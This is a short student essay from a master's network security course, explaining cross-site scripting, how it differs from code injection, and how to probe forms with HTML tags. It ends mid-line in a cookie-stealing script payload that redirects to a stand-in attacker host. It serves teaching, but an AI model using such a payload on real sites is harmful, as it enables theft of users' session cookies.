My Opinion of XSS/CSS, Digital Forensic, and Digital Crime Investigation when I was a Young Student

Note

This is the fourteenth assignment from my Masters Advanced Network Security Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.

1. XSS/CSS

XSS/CSS stands for cross site scripting which is a computer security vulnerability to inject scripts into web pages viewed by other users [1]. What is the difference between code injection? Code injection is a server side vulnerability while XSS is a client side vulnerability, what they have in common is they are injection type attack [2]. One of the easiest method to check for XSS vulnerability is to include a html tags into the submission form, for example on Figure 1 is an <S> (strike-through) html tag inserted on a simple php form input (any php tutorial on the web have this tutorial) and Figure 2 is an example of using <img src=””> tag to add an image, even worse we can input tags that could display the attacker site instead and take the victim site with <script>document.location="http://some_attacker/cookie.cgi?" +…